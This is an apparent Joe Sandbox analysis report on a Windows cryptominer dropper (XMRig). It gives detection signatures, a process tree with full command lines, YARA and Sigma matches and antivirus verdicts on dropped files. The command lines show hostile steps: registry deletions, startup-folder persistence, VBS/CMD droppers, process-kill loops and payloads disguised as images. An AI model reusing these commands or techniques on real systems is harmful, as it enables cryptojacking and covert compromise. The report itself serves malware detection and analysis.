Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K4gsPJGEi4.exe

Overview

General Information

Sample name:K4gsPJGEi4.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
Analysis ID:1467765
MD5:997f25415b30c6da407a75c55806d752
SHA1:5efadd4bfb032e773492a42c391b3be12eabbe98
SHA256:a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Command shell drops VBS files
Drops PE files to the user root directory
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Machine Learning detection for sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May infect USB drives
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected NirCmd tool
Yara signature match

Classification

  • System is w10x64
  • K4gsPJGEi4.exe (PID: 3652 cmdline: "C:\Users\user\Desktop\K4gsPJGEi4.exe" MD5: 997F25415B30C6DA407A75C55806D752)
    • cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5492 cmdline: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4844 cmdline: C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • find.exe (PID: 7060 cmdline: C:\Windows\System32\find.exe "0x0" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
        • wscript.exe (PID: 5312 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 5952 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 1248 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 6164 cmdline: C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wscript.exe (PID: 5576 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 4296 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • screen.exe (PID: 6668 cmdline: "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2" MD5: A1CD6A64E8F8AD5D4B6C07DC4113C7EC)
            • cmd.exe (PID: 1992 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • findstr.exe (PID: 5780 cmdline: C:\Windows\System32\findstr.exe /i /c:"Local" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • findstr.exe (PID: 4824 cmdline: C:\Windows\System32\findstr.exe /i /c:"'" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • screen.exe (PID: 4128 cmdline: "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2" MD5: A1CD6A64E8F8AD5D4B6C07DC4113C7EC)
            • timeout.exe (PID: 2000 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • timeout.exe (PID: 2780 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • timeout.exe (PID: 4676 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • reg.exe (PID: 4324 cmdline: C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • attrib.exe (PID: 6484 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
            • attrib.exe (PID: 6096 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
            • reg.exe (PID: 6416 cmdline: C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • reg.exe (PID: 4072 cmdline: C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • reg.exe (PID: 5168 cmdline: C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • reg.exe (PID: 3408 cmdline: C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • WMIC.exe (PID: 5700 cmdline: C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • findstr.exe (PID: 3576 cmdline: findstr /i /c:"RtkAudio" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
              • Conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7044 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • WMIC.exe (PID: 1992 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • WMIC.exe (PID: 408 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • WMIC.exe (PID: 6604 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • Conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7128 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • WMIC.exe (PID: 5800 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • WMIC.exe (PID: 4432 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • WMIC.exe (PID: 5684 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • attrib.exe (PID: 3288 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
            • attrib.exe (PID: 6132 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
            • attrib.exe (PID: 5740 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
            • attrib.exe (PID: 6252 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
            • attrib.exe (PID: 728 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • timeout.exe (PID: 5580 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • timeout.exe (PID: 7124 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • chcp.com (PID: 1576 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
K4gsPJGEi4.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    K4gsPJGEi4.exeLinux_Trojan_Pornoasset_927f314funknownunknown
    • 0x5ecf78:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
    K4gsPJGEi4.exeMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0xac6289:$a1: mining.set_target
    • 0xab802a:$a2: XMRIG_HOSTNAME
    • 0xabac38:$a3: Usage: xmrig [OPTIONS]
    • 0xab8004:$a4: XMRIG_VERSION
    K4gsPJGEi4.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0xb0fa28:$x1: donate.ssl.xmrig.com
    • 0xb0fef9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    • 0xba0f23:$s2: \\?\pipe\uv\%p-%lu
    K4gsPJGEi4.exeMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0xb110a8:$s1: %s/%s (Windows NT %lu.%lu
    • 0xb15728:$s3: \\.\WinRing0_
    • 0xabcca2:$s4: pool_wallet
    • 0xab74d0:$s5: cryptonight
    • 0xab74de:$s5: cryptonight
    • 0xab74ed:$s5: cryptonight
    • 0xab74fb:$s5: cryptonight
    • 0xab7510:$s5: cryptonight
    • 0xab751f:$s5: cryptonight
    • 0xab752d:$s5: cryptonight
    • 0xab7542:$s5: cryptonight
    • 0xab7551:$s5: cryptonight
    • 0xab7562:$s5: cryptonight
    • 0xab7579:$s5: cryptonight
    • 0xab7587:$s5: cryptonight
    • 0xab7595:$s5: cryptonight
    • 0xab75a5:$s5: cryptonight
    • 0xab75b7:$s5: cryptonight
    • 0xab75c8:$s5: cryptonight
    • 0xab75d8:$s5: cryptonight
    • 0xab75e8:$s5: cryptonight
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\Start.cmdJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        C:\Users\user\AppData\Local\Temp\Start.cmdJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          C:\Users\user\AppData\Local\Temp\two.cmdJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            C:\Users\user\AppData\Local\Temp\two.cmdJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              C:\Users\user\AppData\Local\Temp\RtkAudio.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 29 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                    00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                      • 0xff35:$a1: mining.set_target
                      • 0x1cd6:$a2: XMRIG_HOSTNAME
                      • 0x48e4:$a3: Usage: xmrig [OPTIONS]
                      • 0x1cb0:$a4: XMRIG_VERSION
                      00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                        Click to see the 9 entries
                        SourceRuleDescriptionAuthorStrings
                        18.2.screen.exe.400000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                          23.2.screen.exe.400000.0.unpackJoeSecurity_NirCmdYara detected NirCmd toolJoe Security
                            0.0.K4gsPJGEi4.exe.8bfd60.4.raw.unpackLinux_Trojan_Pornoasset_927f314funknownunknown
                            • 0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
                            0.0.K4gsPJGEi4.exe.8bc490.2.raw.unpackLinux_Trojan_Pornoasset_927f314funknownunknown
                            • 0x1364e8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
                            0.0.K4gsPJGEi4.exe.7b66bc.1.raw.unpackLinux_Trojan_Pornoasset_927f314funknownunknown
                            • 0x23c2bc:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
                            Click to see the 5 entries

                            System Summary

                            barindex
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\K4gsPJGEi4.exe, ProcessId: 3652, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                            Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wbem\WMIC.exe, SourceProcessId: 1992, StartAddress: 76D1D700, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 1992
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe
                            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4296, TargetFilename: C:\Users\Public\Music
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4296, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\d.txt
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe
                            No Snort rule has matched

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: K4gsPJGEi4.exeAvira: detected
                            Source: C:\Users\user\AppData\Local\Temp\IntelSvc.exeAvira: detection malicious, Label: TR/Redcap.mzcqf
                            Source: C:\ProgramData\IntelSvc.exeAvira: detection malicious, Label: TR/Redcap.mzcqf
                            Source: C:\ProgramData\IntelSvc.exeAvira: detection malicious, Label: TR/Redcap.mzcqf
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txtAvira: detection malicious, Label: TR/CoinMiner.cywuh
                            Source: C:\Users\user\AppData\Local\Temp\Start.cmdAvira: detection malicious, Label: BAT/Dldr.Agent.VPC
                            Source: C:\Users\user\AppData\Local\Temp\Systemfont.exeAvira: detection malicious, Label: HEUR/AGEN.1320122
                            Source: C:\Users\Public\RtkAudio.exeAvira: detection malicious, Label: TR/CoinMiner.cywuh
                            Source: C:\Users\user\AppData\Local\Temp\Systemfont.txtAvira: detection malicious, Label: HEUR/AGEN.1320122
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpgAvira: detection malicious, Label: TR/Redcap.mzcqf
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpgAvira: detection malicious, Label: TR/CoinMiner.cywuh
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpgAvira: detection malicious, Label: HEUR/AGEN.1320122
                            Source: C:\Users\Public\RtkAudio.exeAvira: detection malicious, Label: TR/CoinMiner.cywuh
                            Source: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exeAvira: detection malicious, Label: TR/Redcap.mzcqf
                            Source: C:\Users\Public\RtkAudio.exeAvira: detection malicious, Label: TR/CoinMiner.cywuh
                            Source: C:\ProgramData\IntelSvc.exeAvira: detection malicious, Label: TR/Redcap.mzcqf
                            Source: C:\ProgramData\IntelSvc.exeReversingLabs: Detection: 79%
                            Source: C:\ProgramData\cmdow.exeReversingLabs: Detection: 39%
                            Source: C:\Users\Public\IntelSvc.exeReversingLabs: Detection: 79%
                            Source: C:\Users\Public\RtkAudio.exeReversingLabs: Detection: 83%
                            Source: C:\Users\Public\cmdow.exeReversingLabs: Detection: 39%
                            Source: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exeReversingLabs: Detection: 79%
                            Source: C:\Users\user\AppData\Local\Temp\IntelSvc.exeReversingLabs: Detection: 79%
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txtReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeReversingLabs: Detection: 47%
                            Source: C:\Users\user\AppData\Local\Temp\Systemfont.exeReversingLabs: Detection: 63%
                            Source: C:\Users\user\AppData\Local\Temp\Systemfont.txtReversingLabs: Detection: 63%
                            Source: C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exeReversingLabs: Detection: 79%
                            Source: C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpgReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpgReversingLabs: Detection: 79%
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpgReversingLabs: Detection: 63%
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpgReversingLabs: Detection: 39%
                            Source: C:\Users\user\AppData\Local\Temp\cmdow.exeReversingLabs: Detection: 39%
                            Source: C:\Users\user\AppData\Local\Temp\tv_x86.exeReversingLabs: Detection: 79%
                            Source: C:\Windows\SysWOW64\RuntimeBroker.exeReversingLabs: Detection: 47%
                            Source: C:\Windows\SysWOW64\en\Au.aviReversingLabs: Detection: 83%
                            Source: C:\Windows\SysWOW64\en\In.aviReversingLabs: Detection: 79%
                            Source: C:\Windows\SysWOW64\en\Sy.aviReversingLabs: Detection: 63%
                            Source: C:\Windows\SysWOW64\en\cm.aviReversingLabs: Detection: 39%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
                            Source: C:\ProgramData\screen.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\screen.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txtJoe Sandbox ML: detected
                            Source: C:\Users\Public\RtkAudio.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpgJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpgJoe Sandbox ML: detected
                            Source: C:\Users\Public\RtkAudio.exeJoe Sandbox ML: detected
                            Source: C:\Users\Public\RtkAudio.exeJoe Sandbox ML: detected
                            Source: K4gsPJGEi4.exeJoe Sandbox ML: detected

                            Bitcoin Miner

                            barindex
                            Source: Yara matchFile source: K4gsPJGEi4.exe, type: SAMPLE
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Start.cmd, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\two.cmd, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\RtkAudio.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\RtkAudio.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\RtkAudio.exe, type: DROPPED
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                            Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                            Source: K4gsPJGEi4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
